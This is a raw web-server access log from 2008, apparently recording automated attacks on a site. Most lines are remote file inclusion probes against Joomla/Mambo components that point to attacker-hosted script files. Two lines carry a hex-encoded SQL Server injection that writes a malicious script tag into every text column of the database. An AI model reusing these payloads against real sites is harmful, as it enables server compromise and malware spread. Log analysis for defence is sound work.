72.29.65.194 - - [06/Sep/2008:02:34:44 -0400] "GET /logs/error_log.Q108082500//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
72.29.65.194 - - [06/Sep/2008:02:34:44 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
72.29.65.194 - - [06/Sep/2008:02:34:57 -0400] "GET /logs/access_log.Q108082700//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
72.55.148.240 - - [06/Sep/2008:02:35:17 -0400] "GET /logs/error_log.Q108081800//components/com_flyspray/startdown.php?file=http://www.fun-tour.ru/netcat_files/error.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
65.9.172.212 - - [06/Sep/2008:02:31:35 -0400] "GET /logs/access_log.Q108060700?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 491534 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
67.212.173.42 - - [06/Sep/2008:02:36:21 -0400] "GET /logs/access_log.Q108081400//pjsfiles/delete.php?installed_config_file=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.814"
65.9.172.212 - - [06/Sep/2008:02:31:35 -0400] "GET /logs/access_log.Q108060700?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 491534 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
209.59.12.99 - - [06/Sep/2008:02:36:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.174.93.220 - - [06/Sep/2008:02:37:16 -0400] "GET /logs/error_log.q108012200 HTTP/1.1" 200 124828 "-" "Mozilla/5.0 (X11; U; en-US 9000/785; en-US; rv:1.0.0) Gecko/20020605"
88.168.106.155 - - [06/Sep/2008:02:38:17 -0400] "GET /logs/error_log.Q108081500//components/errors.php?error=http://www.xtos.org/images/img??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
70.86.114.90 - - [06/Sep/2008:02:39:23 -0400] "GET /logs//admin/frontpage_right.php?loadadminpage=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.810"
70.86.114.90 - - [06/Sep/2008:02:39:23 -0400] "GET /logs/error_log.Q108060900//admin/frontpage_right.php?loadadminpage=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
70.86.114.90 - - [06/Sep/2008:02:39:23 -0400] "GET //admin/frontpage_right.php?loadadminpage=http://kath-kirche-mhg.rcons.de/administrator/components/com_remository/readme.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
70.86.114.90 - - [06/Sep/2008:02:39:24 -0400] "GET /logs/error_log.Q108081400//admin/frontpage_right.php?loadadminpage=http://kath-kirche-mhg.rcons.de/administrator/components/com_remo